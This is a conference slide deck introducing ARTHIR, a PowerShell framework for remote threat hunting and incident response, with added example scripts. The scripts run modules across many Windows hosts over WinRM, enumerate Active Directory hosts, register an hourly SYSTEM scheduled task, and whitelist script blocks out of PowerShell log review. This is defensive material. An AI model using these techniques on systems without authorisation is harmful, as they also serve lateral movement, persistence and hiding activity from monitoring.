Michael Gough - Co-Founder Introduces ARTHIR for Remote Threat Hunting and Incident Response

1. Michael Gough – Co-Founder
IMF Security.com
LOG-MD.com

2. Whoami
• Blue Team Defender Ninjas, Incident Responder, Threat Hunter, Logaholic
• Michael – Creator of all those Windows Logging Cheat Sheets and the Malware Management Framework
• Co-Creator of “Log-MD” – The Log and Malicious Discovery Tool
• BDIR Podcast - “Brakeing Down Incident Response”
• Special SHOUT OUT to
– Olaf Hartong @OlafHartong
– Josh Rickard @MSAdministrator

4. So what’s the problem?
• There is an event
• We would like to investigate it
• We walk in with our laptops
– Or you use one of your systems
• What tools can you or we use to look across all your Windows systems?
• Without installing anything!!!!
• Using what is already on all Windows systems

5. What are our options?
• Use what we already have like SCCM, BigFix, etc.
• Install a tool with an agent, deal with more agent bloat and agent interaction
• Remote into the system
• Do a forensics acquisition
• Use what is already on the system, living-off-the-land
• What we need is already found on all Windows systems!
• How can we share what we do with enterprise solutions?
• Use something the community can contribute to

6. The Challenge
• Whether you are a Blue Teamer investigating your own environment
• Or a consultant investigating a client
• We need a way to execute a wide range of tools, utilities and scripts remotely to 1, 100 or 1000 systems
• It needs to be flexible enough to allow us to run, respond, and hunt for many things

7. Requirements
• Fits on a thumb drive
• Can run scripts
• Can run tools (no GUI)
• Can run utilities (no GUI)
• Can run larger jobs (Hash/Registry snapshots)
• Schedule Jobs that can run things on a regular basis

8. Requirements
• Walk in with a laptop
• Or use one of your systems
• Domain attached and domain creds
• No requirement to install anything
• Well… we want you to upgrade to PowerShell v5
• PS v5 is the only way to get good PowerShell logging
– You didn’t think I wasn’t going to mention the Malware Archaeology Cheat Sheets did you?
9. What do you have and use?
• What tools do you use for Threat Hunting and Incident Response?
• A bunch of utilities, tools, scripts?
• An EDR/EPP solution?
• Open Source tools and projects?
• Do you have anything?
• More importantly do you have budget?

10. My Top 10 List of tools
1. Log Management
– Centralize data collection
– Query all the data
2. BigFix or equivalent
– Query anything you want on a system
– Run scripts, utilities, tools, etc.
– Run remediation jobs
3. LOG-MD
– Log Harvesting
– Hunting
– AutoRuns
– PowerShell
– SRUM
– Much more

12. The problem I wanted to solve
• I want to query all the things #2
• I want to run scripts, utilities, tools #2
• I want to have the option to centralize the data #1
• I want to query that data #1
• I don’t want to, or can’t install anything
• Of course I want to run my favorite utility/tool
– LOG-MD-Professional

13. The problem I wanted to solve
• I am one of the creators of LOG-MD
• It is a great utility/tool
• It does a LOT of what I need to investigate a system
• I just needed a way to run it remotely on 1, 100 or 1000 systems to do Threat Hunting and/or Incident Response
• And pull back the reports and organize them
• Maybe even collect them into a Log Management solution #1
• Without an enterprise solution like BigFix #2

15. 3 years ago…
• We announced LOG-MD at this very conference
• Today we would like to announce the release of…
• ATT&CK Remote Threat Hunting Incident Response
ARTHIR.com

16. PowerShell?
• PowerShell is on every Windows system
• Can we use that?
• But can we run our own special binaries?
• We love our own tools
• Create scripts
• Something modular
• Allows for community support
17.
• A modular framework
• Leverages an existing project that we modified to do what we wanted and needed
• KANSA was good, but lacked some capabilities
• I needed to run all features of LOG-MD and pull the reports back
• KANSA did not work well at all for LOG-MD
• And run other utilities, say Sysinternals

18.
• So KANSA did some kewl stuff, just not enough
• So we modified it
• We had a couple issues
• Olaf Hartong helped us with report retrieval
• Josh Rickard helped us with scheduled tasks
• Once these changes were added suddenly we had something that gave me a LOT of what BigFix could do

20. What does ATT&CK have to do with it?
• We LOVE MITRE ATT&CK
• It is a GREAT place to map your hunts to
• Or what to detect and hunt for
• It’s what your adversaries ACTUALLY do in their attacks
• If you can detect and/or hunt for the techniques in MITRE ATT&CK… you are WAY ahead of most

21. MITRE ATT&CK™
• The A in ARTHIR stands for ATT&CK™
• The idea here is to encourage you and anyone making modules to map their efforts to MITRE ATT&CK
• Help us Help the rest of us
• Take this information and any other detection and hunting you can do and add it to YOUR own ATT&CK Matrix

22. Add your ATT&CK Mappings
• Check MITRE ATT&CK Tactics and Techniques and add them to the ARTHIR module
• Map them to an overall matrix

23. Cheat Sheets
• We released two ATT&CK cheat sheets as a part of my SANS THIR talk in NOLA last year
• The goal was to see how good, or bad really good logging would be for detecting or hunting the techniques in ATT&CK
• It was shocking how much coverage there was
• Over 80%

24. Fill out YOUR ATT&CK Matrix

25. Remote
• The R in ARTHIR stands for Remote
• We need to be able to hunt and respond remotely
• Execute what we want on 1, 10, 100, or 1000 systems
• And not 1 by 1 like you would have to with RDP or some EDRs
• Bring back results to a central system
• Like BigFix can do

26. Threat Hunting
• The TH in ARTHIR stands for Threat Hunting
• We need to be able to hunt for artifacts from the techniques the adversaries use
• Run additional tools and utilities to hunt
• Centrally send results to say… log management

27. Incident Response
• The IR in ARTHIR stands for Incident Response
• We need to be able to respond to an attack
• Do additional investigation from an alert
• Run additional tools and utilities
• Centrally send results to say… log management
28. Modular
• We used the KANSA framework
• Even ported a few of the KANSA modules
• This framework design worked for us, no reason to totally reinvent the wheel
• Create a module, add it to modules.conf
• Run the execution parameters
• Retrieve the reports
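The create-module / run / retrieve-reports loop on this slide, shown as a minimal runner in the style ARTHIR inherits from Kansa. This is an added example written for this page, not ARTHIR.ps1 or Kansa's own code. It assumes (none of this is stated on the slides) that Hosts.txt holds one host per line, that modules.conf lists one module path per line relative to the Modules folder with '#' comment lines, that a module may leave report files under a hypothetical C:\ARTHIR_Reports folder on the target, and that PowerShell remoting (WinRM) is enabled for the analyst's domain account.

```powershell
# Added example written for this page; it is not ARTHIR.ps1 or Kansa's own code.
# Assumptions (not from the deck): Hosts.txt holds one host per line, modules.conf
# lists one module path per line relative to the Modules folder with '#' comments,
# each module optionally writes report files under $RemoteReportDir on the target,
# and WinRM/PowerShell remoting is enabled for the analyst's domain account.
param(
    [string]$HostsFile       = '.\Hosts.txt',
    [string]$ModulesRoot     = '.\Modules',
    [string]$ModulesConf     = '.\Modules\modules.conf',
    [string]$LocalOutputDir  = '.\Output',
    [string]$RemoteReportDir = 'C:\ARTHIR_Reports'   # hypothetical report folder on each target
)

$targets = Get-Content $HostsFile   | ForEach-Object { $_.Trim() } | Where-Object { $_ }
$modules = Get-Content $ModulesConf | ForEach-Object { $_.Trim() } | Where-Object { $_ -and -not $_.StartsWith('#') }
$stamp   = Get-Date -Format 'yyyyMMdd-HHmmss'

# One session per host; hosts that fail to connect surface as non-terminating errors
$sessions = New-PSSession -ComputerName $targets -ErrorAction SilentlyContinue -ErrorVariable connErrs
foreach ($e in $connErrs) { Write-Warning "Connect failed: $($e.Exception.Message)" }
if (-not $sessions) { throw 'No reachable hosts; nothing to run.' }

foreach ($module in $modules) {
    $modulePath = Join-Path $ModulesRoot $module
    $moduleName = [IO.Path]::GetFileNameWithoutExtension($modulePath)
    if (-not (Test-Path $modulePath)) { Write-Warning "Missing module: $modulePath"; continue }

    # Fan out: the script body is sent to every session and runs concurrently there;
    # each returned object is tagged with PSComputerName by the remoting layer
    $results = Invoke-Command -Session $sessions -FilePath $modulePath -ArgumentList $RemoteReportDir `
        -ErrorAction Continue -ErrorVariable runErrs
    foreach ($e in $runErrs) {
        $where = if ($e.OriginInfo) { $e.OriginInfo.PSComputerName } else { 'local' }
        Write-Warning "$moduleName on ${where}: $($e.Exception.Message)"
    }

    # Objects the module emitted: one CSV per host per module, so reports stay organized
    foreach ($group in ($results | Group-Object -Property PSComputerName)) {
        $hostDir = Join-Path $LocalOutputDir $group.Name
        New-Item -ItemType Directory -Path $hostDir -Force | Out-Null
        $group.Group |
            Select-Object -Property * -ExcludeProperty PSComputerName, PSShowComputerName, RunspaceId |
            Export-Csv -Path (Join-Path $hostDir "$moduleName-$stamp.csv") -NoTypeInformation
    }
}

# Report retrieval: files a tool such as LOG-MD leaves on the target's disk are copied back
# over the same sessions. Copy-Item -FromSession needs PowerShell 5 on the analyst side,
# which is the version the deck asks you to upgrade to.
foreach ($s in $sessions) {
    $hostDir = Join-Path $LocalOutputDir $s.ComputerName
    New-Item -ItemType Directory -Path $hostDir -Force | Out-Null
    $hasReports = Invoke-Command -Session $s -ScriptBlock { param($dir) Test-Path -Path $dir } -ArgumentList $RemoteReportDir
    if ($hasReports) {
        Copy-Item -FromSession $s -Path (Join-Path $RemoteReportDir '*') -Destination $hostDir -Recurse -Force
    }
}
Remove-PSSession -Session $sessions
```

Two design points worth noting: sessions are created once and reused for every module and for the copy-back, which keeps the number of authentication events per host down (one 4624 per host rather than one per module), and the per-host output folders give you something you can point a log management agent at, which is the "centralize the data" option from slide 12.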
29. RECON
• We provided some PowerShell scripts to get system names from Active Directory
• You need to build a list of systems
• And we provided a Ping script so you can test those system names are alive
• Add these to Hosts.txt to run your modules against
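The two recon steps on this slide (pull system names from Active Directory, ping-test them, write Hosts.txt) as one script. This is an added example, not the Recon scripts that ship with ARTHIR. It assumes the RSAT ActiveDirectory module is installed on the analyst system and that the session holds domain credentials; the 30-day logon cutoff, the OU scoping parameter and the optional WinRM check are my additions, since the deck only mentions ping.

```powershell
# Added example (not ARTHIR's own Recon scripts): build Hosts.txt from Active Directory
# and keep only hosts that answer a ping and, optionally, have WinRM reachable.
# Assumptions: the RSAT ActiveDirectory module is installed on the analyst system and
# the account running this has domain credentials (as the deck requires).
Import-Module ActiveDirectory

function Get-LiveDomainHosts {
    [CmdletBinding()]
    param(
        # Only computers that have authenticated recently; stale objects waste hunt time
        [int]$MaxDaysSinceLogon = 30,
        # Optional OU/container to scope the query, e.g. "OU=Workstations,DC=corp,DC=example"
        [string]$SearchBase = $null,
        # ARTHIR runs over PowerShell remoting, so a WinRM check is the more useful liveness test
        [switch]$RequireWinRM
    )
    $cutoff = (Get-Date).AddDays(-$MaxDaysSinceLogon)
    $params = @{
        Filter     = "Enabled -eq 'True' -and OperatingSystem -like '*Windows*'"
        Properties = 'OperatingSystem', 'LastLogonDate', 'DNSHostName'
    }
    if ($SearchBase) { $params['SearchBase'] = $SearchBase }

    $candidates = Get-ADComputer @params |
        Where-Object { $_.LastLogonDate -and $_.LastLogonDate -gt $cutoff -and $_.DNSHostName }

    foreach ($c in $candidates) {
        $name = $c.DNSHostName
        # Ping first (the deck's Ping script); -Quiet returns a plain boolean
        if (-not (Test-Connection -ComputerName $name -Count 1 -Quiet -ErrorAction SilentlyContinue)) {
            Write-Verbose "No ping reply from $name"
            continue
        }
        if ($RequireWinRM) {
            try { Test-WSMan -ComputerName $name -ErrorAction Stop | Out-Null }
            catch { Write-Verbose "WinRM not reachable on $name"; continue }
        }
        [pscustomobject]@{ Host = $name; OS = $c.OperatingSystem; LastLogon = $c.LastLogonDate }
    }
}

# Usage: one host per line for Hosts.txt, plus a CSV of the same inventory for the case notes
$live = Get-LiveDomainHosts -RequireWinRM -Verbose
$live | Sort-Object Host | Select-Object -ExpandProperty Host | Set-Content -Path .\Hosts.txt
$live | Export-Csv -Path .\Recon-Inventory.csv -NoTypeInformation
Write-Host ("{0} live hosts written to Hosts.txt" -f @($live).Count)
```

Keep the CSV alongside Hosts.txt: when a module later fails on a host, the OS and last-logon columns are usually the first thing you want to know, and a host that pinged but failed the WinRM check is itself a finding worth noting during an incident.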
30. Available modules
• Several more popular KANSA modules have been converted
• More will be done as we move forward and need them
• We provided templates so YOU can do it too
• Remember that ‘community can contribute’ statement from earlier?

31. Root Directory
ATT&CK – Some ATT&CK Matrix you can use
Documentation – How To Documentation
Known 3rd-Party – Known 3rd party modules for ARTHIR
Modules – Where all the modules are and modules.conf
Recon – Where Recon scripts live
ARTHIR.ps1 – The main ARTHIR script
Hosts.txt – Where you place hosts to run modules on

32. Module types
Bin – Where you place .EXE and Zip files
Cleanup – Module(s) to delete ARTHIR remnants
Info – Modules to collect info about a system
Kansa_Legacy – Converted KANSA modules
LOG-MD – All LOG-MD modules
LOG-MD_Tasks – Modules to schedule LOG-MD hourly/daily
Sysinternals – Converted KANSA Sysinternals modules
Templates – Templates to make your own modules

33. KANSA converted modules
### Configuration modules
# Kansa_Legacy\Config\Get-Anti-MW-HealthStatus.ps1
# Kansa_Legacy\Config\Get-Anti-MW-InfectionStatus.ps1
# Kansa_Legacy\Config\Get-Hotfix_Patches.ps1
# Kansa_Legacy\Config\Get-Local_Accounts.ps1
# Kansa_Legacy\Config\Get-Local_Admin_Accounts.ps1
### Log modules
# Kansa_Legacy\Log\Get-AppCompatCache.ps1
# Kansa_Legacy\Log\Get-CBS_Log.ps1

34. KANSA converted modules
### Network modules
# Kansa_Legacy\Disk\Get-Temp_Dir_Listing.ps1
# Kansa_Legacy\Disk\Get-User_Name_Dir_Listing.ps1
# Kansa_Legacy\Disk\Get-User_Name_Dir_Listing_List_of_Extensions.ps1
# Kansa_Legacy\Disk\Get-Users_Dir_Listing.ps1
### Network modules
# Kansa_Legacy\Net\Get-Arp.ps1
# Kansa_Legacy\Net\Get-DNS-Cache.ps1
# Kansa_Legacy\Net\Get-Net-IP-Interface.ps1
# Kansa_Legacy\Net\Get-Netstat.ps1
### Cleanup/Delete ARTHIR folders
# Cleanup\GetDelete_ARTHIR_Folders.ps1

35. Templates
• Get-Binary-Template.ps1
• Get-Script-Template.ps1
• Get-Task-Template-Daily.ps1
• Get-Task-Template-Hourly.ps1
• Get-Zip-Template.ps1
• Variables used to make editing/changing modules easier than KANSA
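What an hourly task module has to do on the target, shown as an added example that is not ARTHIR's Get-Task-Template-Hourly.ps1 or its LOG-MD_Tasks modules. It registers, reports on and removes a scheduled task that runs a collection script as SYSTEM every hour on the system where it executes (ARTHIR would push it to each host over remoting). The task name and script path are hypothetical, and the ScheduledTasks cmdlets it uses are those built into Windows 8 / Server 2012 and later.

```powershell
# Added example (not ARTHIR's Get-Task-Template-Hourly.ps1): register, inspect and remove
# an hourly scheduled task that runs a collection script as SYSTEM on the local system.
# Assumptions: the task name and script path below are hypothetical placeholders, and the
# built-in ScheduledTasks module (Windows 8 / Server 2012 and later) is available.
function Register-HourlyHuntTask {
    param(
        [string]$TaskName   = 'ARTHIR-Hourly-Hunt',            # hypothetical task name
        [string]$ScriptPath = 'C:\ARTHIR\Modules\Run-Hunt.ps1'  # hypothetical collection script
    )
    $action = New-ScheduledTaskAction -Execute 'powershell.exe' `
        -Argument "-NoProfile -NonInteractive -File `"$ScriptPath`""
    # A single trigger that repeats every hour; a long RepetitionDuration keeps it effectively open-ended
    $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) `
        -RepetitionInterval (New-TimeSpan -Hours 1) -RepetitionDuration (New-TimeSpan -Days 3650)
    $principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest
    # Cap the run time and never start a second copy while one is still collecting
    $settings = New-ScheduledTaskSettingsSet -ExecutionTimeLimit (New-TimeSpan -Minutes 30) `
        -MultipleInstances IgnoreNew -StartWhenAvailable
    Register-ScheduledTask -TaskName $TaskName -Action $action -Trigger $trigger `
        -Principal $principal -Settings $settings -Force
}

function Get-HuntTaskStatus {
    param([string]$TaskName = 'ARTHIR-Hourly-Hunt')
    $task = Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue
    if (-not $task) { return $null }
    $info = $task | Get-ScheduledTaskInfo
    [pscustomobject]@{
        Task       = $TaskName
        State      = $task.State
        LastRun    = $info.LastRunTime
        LastResult = $info.LastTaskResult   # 0 means the last run exited cleanly
        NextRun    = $info.NextRunTime
    }
}

function Remove-HuntTask {
    param([string]$TaskName = 'ARTHIR-Hourly-Hunt')
    # The Cleanup module's job: leave nothing behind when the engagement ends
    Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false -ErrorAction SilentlyContinue
}

# Usage on the target
Register-HourlyHuntTask | Out-Null
Get-HuntTaskStatus | Format-List
```

Task registration is itself logged (event 4698 in the Security log when auditing is on, and the Microsoft-Windows-TaskScheduler/Operational log), so the task name is one more item to add to your whitelist in the same way the next slides handle ARTHIR's PowerShell noise, and the Remove-HuntTask step belongs in whatever cleanup module you run at the end.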
36. Modules for Utility/Tools
• LOG-MD… Duh
• LOG-MD Free Edition
• LOG-MD-Professional, all features
• LOG-MD-Professional Tasks, Hourly & Daily
• Sysinternals – Sigcheck
• Sysinternals – Handle
39. You will make PowerShell noise
• Since ARTHIR uses PowerShell…
• The adversaries use PowerShell
• You will add events to the PowerShell logs
• So test and whitelist the scriptblocks that ARTHIR creates
• Make it easier to hunt the bad
• LOG-MD provides a Whitelist_PowerShell.txt with many exclusions

40. Some ARTHIR PS Exclusions
# ARTHIR related items to exclude known ARTHIR components
#
*ARTHIR - *
*## ARTHIR*
*$ARTHIR_Dir*
*CODE ARTHIR*
*ARTHIR*
*$ARTHIR_OutputDir*
*value="ProcessName. ProcId. HandleId. Owner. Type. Perms. Name*
*Write-Output "Prefetch not enabled on*
#
# More generic ARTHIR scriptblocks
#
*PackageManagement.format.ps1xml*
*NestedModules="Microsoft.PowerShell.Commands.Management.dll*
*RootModule = "Microsoft.PowerShell.PackageManagement.dll*
*System.Management.Automation.PSDriveInfo] $driveInfo*
*Microsoft.PowerShell.Management\Test-Path $pathToValidate*
*Microsoft.PowerShell.Management\Test-Path $getPathItems*
*function PSCopyFileFromRemoteSession*
*function PSGetFileMetadata*
*function PerformCopyFileFromRemoteSession*
*function PSSourceSupportsAlternateStreams*
*indentString = "+ PSComputerName : " + $originInfo.PSComputerName*
*-ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView*
*# .ExternalHelp System.Management.Automation.dll-help.xml*
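How a whitelist like the one above is actually applied to the PowerShell logs, as an added example that is not LOG-MD's own whitelist code. It reads ScriptBlock logging events (event 4104 in Microsoft-Windows-PowerShell/Operational), reassembles script blocks that were logged in several fragments, and drops any block that matches a wildcard pattern. It assumes PowerShell v5 with ScriptBlock logging turned on, and a whitelist in the one-pattern-per-line, '#'-comment format shown on the slide; the inline list is a constructed stand-in for Whitelist_PowerShell.txt, built from a few of the patterns above.

```powershell
# Added example (not LOG-MD's own whitelist implementation): review PowerShell ScriptBlock
# logging (event 4104, Microsoft-Windows-PowerShell/Operational) and drop script blocks that
# match known-good wildcard patterns such as the ARTHIR exclusions on the slide.
# Assumptions: PowerShell v5 with ScriptBlock logging enabled; the constructed inline
# whitelist below stands in for LOG-MD's Whitelist_PowerShell.txt (same line format).
$constructedWhitelist = @'
# ARTHIR related items to exclude known ARTHIR components
*ARTHIR - *
*$ARTHIR_OutputDir*
*function PSCopyFileFromRemoteSession*
*# .ExternalHelp System.Management.Automation.dll-help.xml*
'@

function Read-WhitelistPatterns {
    param([string]$Text)
    # One wildcard pattern per line; blank lines and '#' comments are ignored
    $Text -split "`r?`n" | ForEach-Object { $_.Trim() } | Where-Object { $_ -and -not $_.StartsWith('#') }
}

function Get-UnwhitelistedScriptBlocks {
    param(
        [string[]]$Patterns,
        [datetime]$Since = (Get-Date).AddHours(-24),
        [int]$MaxEvents = 10000
    )
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since }
    $events = Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue

    # 4104 properties: [0] MessageNumber, [1] MessageTotal, [2] ScriptBlockText, [3] ScriptBlockId, [4] Path.
    # Large scripts are logged as several fragments; reassemble them by ScriptBlockId before
    # matching, otherwise a pattern can straddle a fragment boundary and the block slips through.
    $byId = @{}
    foreach ($ev in $events) {
        $id = [string]$ev.Properties[3].Value
        $n  = [int]$ev.Properties[0].Value
        if (-not $byId.ContainsKey($id)) {
            $byId[$id] = [pscustomobject]@{ Id = $id; First = $ev.TimeCreated; Path = $ev.Properties[4].Value; Parts = @{} }
        }
        $byId[$id].Parts[$n] = [string]$ev.Properties[2].Value
        if ($ev.TimeCreated -lt $byId[$id].First) { $byId[$id].First = $ev.TimeCreated }
    }

    foreach ($entry in $byId.Values) {
        $text    = ($entry.Parts.Keys | Sort-Object | ForEach-Object { $entry.Parts[$_] }) -join ''
        $matched = $Patterns | Where-Object { $text -like $_ } | Select-Object -First 1
        if ($matched) { continue }   # known ARTHIR / LOG-MD noise, skip it
        $snippet = $text -replace '\s+', ' '
        [pscustomobject]@{
            FirstSeen     = $entry.First
            ScriptBlockId = $entry.Id
            Path          = $entry.Path          # empty for blocks typed or sent over remoting
            Fragments     = $entry.Parts.Count
            Snippet       = $snippet.Substring(0, [Math]::Min(160, $snippet.Length))
        }
    }
}

# Usage: what is left after the whitelist is what you actually need to read
$patterns = Read-WhitelistPatterns -Text $constructedWhitelist
Get-UnwhitelistedScriptBlocks -Patterns $patterns | Sort-Object FirstSeen | Format-Table -AutoSize
```

Two caveats when you grow the list: PowerShell's -like operator treats [ as the start of a character class, so a pattern that contains a literal [ (the PSDriveInfo entry on the slide has a ] only, which is fine) needs it escaped as [[]; and a very broad pattern such as *ARTHIR* also hides anything an adversary names to look like your tooling, so test the list against the blocks you expect to see before relying on it, as the slide says.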
41. Conclusion
• Try it you’ll like it
• Mikey does…
• Contribute
• Send us ideas
• It’s Open Source on GitHub
• www.ARTHIR.com

43. Cheat Sheets
• Windows ATT&CK Logging Cheat Sheet
• Windows ATT&CK LOG-MD Cheat Sheet
– www.MalwareArchaeology.com/cheat-sheets
• ATT&CK Matrix Spreadsheet template
– Comes with ARTHIR
Get ARTHIR
• www.ARTHIR.com
• https://github.com/MalwareArchaeology/ARTHIR

44. MITRE ATT&CK™ Sites
MITRE ATTACK
• https://attack.mitre.org/
Enterprise
• https://attack.mitre.org/techniques/enterprise/
ATT&CK Navigator
• https://mitre.github.io/attack-navigator/enterprise/

45. Recommended Sites
OSSEM - Open Source Security Events Metadata
• https://github.com/Cyb3rWard0g/OSSEM
SOCPrime SIGMA to SIEM convertor
• https://uncoder.io/
SIGMA - Generic Signature Format for SIEM Systems
• https://github.com/Neo23x0/sigma
Red Canary Atomic Red Team
• https://atomicredteam.io/
MATE - MITRE ATT&CK® Technique Emulation
• https://github.com/fugawi/mate
Atomic Threat Coverage
• https://github.com/krakow2600/atomic-threat-coverage

46. Recommended Sites
The ThreatHunter-Playbook
• https://github.com/Cyb3rWard0g/ThreatHunter-Playbook
OLAF Hartong
ThreatHunting | A Splunk app mapped to MITRE ATT&CK to guide your threat hunts
• https://github.com/olafhartong/ThreatHunting
Sysmon-modular | A Sysmon configuration repository for everybody to customize
• https://github.com/olafhartong/sysmon-modular

48. Questions
• You can find us on the Twitters
– @HackerHurricane
• LOG-MD.com
• MalwareArchaeology.com
• Preso will be on SlideShare and linked on MalwareArchaeology.com
• Listen to the PodCast to hear the rest of this topic
– http://www.brakeingdownir.libsyn.com/